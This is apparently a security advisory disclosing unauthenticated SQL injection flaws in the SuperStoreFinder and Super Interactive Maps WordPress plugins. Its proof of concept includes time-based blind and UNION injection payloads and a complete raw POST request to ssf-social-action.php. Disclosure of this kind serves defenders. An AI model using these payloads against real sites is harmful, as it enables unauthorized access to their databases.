SuperStoreFinder & SuperInteractiveMaps – Unauthenticated SQL Injections

Description

The ssf-social-action.php and sim-wp-data.php files from the respective superstorefinder-wp (<= 6.3) and super-interactive-maps (<= 2.1) plugins are effected by Multiple Unauthenticated SQL Injections, as they do not sanitise user data before using them in SQL statements.

superstorefinder-wp fixed most of the SQLi in v6.4, however one was still there and has been fixed in 6.5

Proof of Concept

Note: For the superstorefinder-wp plugin, other parameters are affected, such as ssf_wp_user_email, commentId etc

Parameter: ssf_wp_id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=select&ssf_wp_id=1 AND (SELECT 7900 FROM (SELECT(SLEEP(5)))gxXh)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: action=select&ssf_wp_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6b71,0x416b6d4c6f41746d5578724d484b487946734a675a4b4a4e7a777a4544714b6f4171766e74624362,0x7170706271),NULL,NULL,NULL,NULL-- -


POST /wp-content/plugins/superstorefinder-wp/ssf-social-action.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Connection: close
Upgrade-Insecure-Requests: 1

action=select&ssf_wp_id=1%20AND%20(SELECT%207900 FROM%20(SELECT(SLEEP(5)))gxXh)